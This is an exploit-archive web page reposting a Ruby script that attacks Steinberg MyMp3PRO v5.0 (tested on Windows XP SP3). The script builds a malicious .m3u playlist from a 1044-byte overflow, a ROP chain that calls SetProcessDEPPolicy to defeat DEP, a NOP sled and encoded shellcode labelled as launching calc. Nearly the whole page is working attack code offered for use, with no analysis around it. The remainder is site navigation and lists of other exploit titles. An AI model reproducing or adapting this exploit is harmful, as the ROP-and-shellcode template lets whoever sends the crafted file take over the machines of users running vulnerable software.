首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Steinberg MyMp3PRO v5.0 DEP Bypass with ROP
来源:metacom27[at]gmail.com 作者:metacom 发布时间:2013-12-05  
#!/usr/bin/ruby
print '''
           
        Steinberg MyMp3PRO v5.0 DEP Bypass with ROP 
        Version: 5.0 Build 5.1.0.21
        Date found: 04.12.2013
        Exploit Author: metacom
        Tested on:XP-Sp3-EN
'''
sleep(3)
junk="\x41" * 1044
##ROP --> Bypass DEP with SetProcessDEPPolicy
rop =[0x77F6C25F].pack('V')# POP EBX / RET 
rop+=[0x41414141].pack('V')# JUNK
rop+=[0xFFFFFFFF].pack('V')# PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF
rop+=[0x7CB30B7E].pack('V')# INC EBX / RET 
rop+=[0x77F645BF].pack('V')# POP EBP / RET 
rop+=[0x7C862144].pack('V')# <- SetProcessDEPPolicy
rop+=[0x77F65493].pack('V')# POP EDI / RET 
rop+=[0x77F614BA].pack('V')# RET 
rop+=[0x77F6567E].pack('V')# POP ESI  / RET
rop+=[0x77F614BA].pack('V')# RET
rop+=[0x7CA0A62B].pack('V')# PUSHAD / RET
nops="\x90" * 100 # landing zone
shellcode=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"+
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"+
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"+
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"+ # Calc 
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"+ # \x00\x0a\x0d
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"+
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"+
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"+
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"+
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"+
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"+
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"+
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"+
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"+
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"+
"\xea\x47")
buffer=junk + rop + nops + shellcode
File.open('DEP_Bypass_ROP_Steinberg_MyMp3PRO_v5.m3u', 'w') do |bug|  
bug.puts (buffer)
bug.close()
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Steinberg MyMp3PRO v5.0 SEH Bu
·Windows NDPROXY Local SYSTEM P
·Steinberg MyMp3PRO v5.0 Buffer
·Firefox FBTest 1.12b4 Command
·Kimai v0.9.2 'db_restore.php'
·TP-Link 150M Wireless Lite N R
·WordPress OptimizePress Theme
·D-Link DIR-XXX Remote Root Acc
·Cisco Prime Data Center Networ
·OpenSSL Denial Of Service
·Total Video Player 1.3.1 (Sett
·Kaseya uploadImage Arbitrary F
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved